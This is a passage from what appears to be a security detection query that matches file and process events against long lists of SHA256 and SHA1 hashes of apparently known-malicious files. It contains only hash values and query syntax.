ESCAPE '\\' OR Hashes LIKE '%SHA256=fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15%' ESCAPE '\\' OR Hashes LIKE '%SHA256=543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433%' ESCAPE '\\' OR Hashes LIKE '%SHA256=da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec%' ESCAPE '\\' OR Hashes LIKE '%SHA256=771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', '8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', '35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', '65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', '3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', '943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 'F40435488389B4FB3B945CA21A8325A51E1B5F80F045AB019748D0EC66056A8B', '2A652DE6B680D5AD92376AD323021850DAB2C653ABF06EDF26120F7714B8E08A', '950A4C0C772021CEE26011A92194F0E58D61588F77F2873AA0599DFF52A160C9', '0AAFA9F47ACF69D46C9542985994FF5321F00842A28DF2396D4A3076776A83CB', '47F08F7D30D824A8F4BB8A98916401A37C0FD8502DB308ABA91FE3112B892DCC', 'B9A4E40A5D80FEDD1037EAED958F9F9EFED41EB01ADA73D51B5DCD86E27E0CBF', '5C04C274A708C9A7D993E33BE3EA9E6119DC29527A767410DBAF93996F87369A', '0040153302B88BEE27EB4F1ECA6855039E1A057370F5E8C615724FA5215BADA3', '3326E2D32BBABD69FEB6024809AFC56C7E39241EBE70A53728C77E80995422A5', '36B9E31240AB0341873C7092B63E2E0F2CAB2962EBF9B25271C3A1216B7669EB', '29E0062A017A93B2F2F5207A608A96DF4D554C5DE976BD0276C2590A03BD3E94', '45ABDBCD4C0916B7D9FAAF1CD08543A3A5178871074628E0126A6EDA890D26E0', '50DB5480D0392A7DD6AB5DF98389DC24D1ED1E9C98C9C35964B19DABCD6DC67F', '607DC4C75AC7AEF82AE0616A453866B3B358C6CF5C8F9D29E4D37F844306B97C', '61D6E40601FA368800980801A662A5B3B36E3C23296E8AE1C85726A56EF18CC8', '74A846C61ADC53692D3040AFF4C1916F32987AD72B07FE226E9E7DBEFF1036C4', '76FB4DEAEE57EF30E56C382C92ABFFE2CF616D08DBECB3368C8EE6B02E59F303', '81939E5C12BD627FF268E9887D6FB57E95E6049F28921F3437898757E7F21469', '9790A7B9D624B2B18768BB655DDA4A05A9929633CEF0B1521E79E40D7DE0A05B', '9A1D66036B0868BBB1B2823209FEDEA61A301D5DD245F8E7D390BD31E52D663E', 'AA9AB1195DC866270E984F1BED5E1358D6EF24C515DFDB6C2A92D1E1B94BF608', 'AF095DE15A16255CA1B2C27DAD365DFF9AC32D2A75E8E288F5A1307680781685', 'D5586DC1E61796A9AE5E5D1CED397874753056C3DF2EB963A8916287E1929A71', 'D8459F7D707C635E2C04D6D6D47B63F73BA3F6629702C7A6E0DF0462F6478AE2', 'E81230217988F3E7EC6F89A06D231EC66039BDBA340FD8EBB2BBB586506E3293', 'F88EBB633406A086D9CCA6BC8B66A4EA940C5476529F9033A9E0463512A23A57', '1C8DFA14888BB58848B4792FB1D8A921976A9463BE8334CFF45CC96F1276049A', '22418016E980E0A4A2D01CA210A17059916A4208352C1018B0079CCB19AAF86A', '405472A8F9400A54BB29D03B436CCD58CFD6442FE686F6D2ED4F63F002854659', '49F75746EEBE14E5DB11706B3E58ACCC62D4034D2F1C05C681ECEF5D1AD933BA', '4A3D4DB86F580B1680D6454BAEE1C1A139E2DDE7D55E972BA7C92EC3F555DCE2', '4AB41816ABBF14D59E75B7FAD49E2CB1C1FEB27A3CB27402297A2A4793FF9DA7', '54841D9F89E195196E65AA881834804FE3678F1CF6B328CAB8703EDD15E3EC57', '5EE292B605CD3751A24E5949AAE615D472A3C72688632C3040DC311055B75A92', '76B86543CE05540048F954FED37BDDA66360C4A3DDB8328213D5AEF7A960C184', '7F190F6E5AB0EDAFD63391506C2360230AF4C2D56C45FC8996A168A1FC12D457', '845F1E228DE249FC1DDF8DC28C39D03E8AD328A6277B6502D3932E83B879A65A', '84BF1D0BCDF175CFE8AEA2973E0373015793D43907410AE97E2071B2C4B8E2D4', '8EF0AD86500094E8FA3D9E7D53163AA6FEEF67C09575C169873C494ED66F057F', 'A56C2A2425EB3A4260CC7FC5C8D7BED7A3B4CD2AF256185F24471C668853AEE8', 'AC3F613D457FC4D44FA27B2E0B1BAA62C09415705EFB5A40A4756DA39B3AC165', 'B1334A71CC73B3D0C54F62D8011BEC330DFC355A239BF94A121F6E4C86A30A2E', 'B47BE212352D407D0EF7458A7161C66B47C2AEC8391DD101DF11E65728337A6A', 'B9B3878DDC5DFB237D38F8D25067267870AFD67D12A330397A8853209C4D889C', 'DB90E554AD249C2BD888282ECF7D8DA4D1538DD364129A3327B54F8242DD5653', 'E61A54F6D3869B43C4ECEAC3016DF73DF67CCE03878C5A6167166601C5D3F028', '3871E16758A1778907667F78589359734F7F62F9DC953EC558946DCDBE6951E3', '80CBBA9F404DF3E642F22C476664D63D7C229D45D34F5CD0E19C65EB41BECEC3', 'BB50818A07B0EB1BD317467139B7EB4BAD6CD89053FECDABFEAE111689825955', 'FF6729518A380BF57F1BC6F1EC0AA7F3012E1618B8D9B0F31A61D299EE2B4339', '3A5EC83FE670E5E23AEF3AFA0A7241053F5B6BE5E6CA01766D6B5F9177183C25', '61A1BDDDD3C512E681818DEBB5BEE94DB701768FC25E674FCAD46592A3259BD0', '07B6D69BAFCFD767F1B63A490A8843C3BB1F8E1BBEA56176109B5743C8F7D357', '21CCDD306B5183C00ECFD0475B3152E7D94B921E858E59B68A03E925D1715F21', '2D83CCB1AD9839C9F5B3F10B1F856177DF1594C66CBBC7661677D4B462EBF44D', 'F581DECC2888EF27EE1EA85EA23BBB5FB2FE6A554266FF5A1476ACD1D29D53AF', 'F8965FDCE668692C3785AFA3559159F9A18287BC0D53ABB21902895A8ECF221B', '3D23BDBAF9905259D858DF5BF991EB23D2DC9F4ECDA7F9F77839691ACEF1B8C4', 'DD4A1253D47DE14EF83F1BC8B40816A86CCF90D1E624C5ADF9203AE9D51D4097', '509628B6D16D2428031311D7BD2ADD8D5F5160E9ECC0CD909F1E82BBBB3234D6', '525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD', '6DE84CAA2CA18673E01B91AF58220C60AECD5CCCF269725EC3C7F226B2167492', '09BEDBF7A41E0F8DABE4F41D331DB58373CE15B2E9204540873A1884F38BDDE1', '101402D4F5D1AE413DED499C78A5FCBBC7E3BAE9B000D64C1DD64E3C48C37558', '131D5490CEB9A5B2324D8E927FEA5BECFC633015661DE2F4C2F2375A3A3B64C6', '1DDFE4756F5DB9FB319D6C6DA9C41C588A729D9E7817190B027B38E9C076D219', 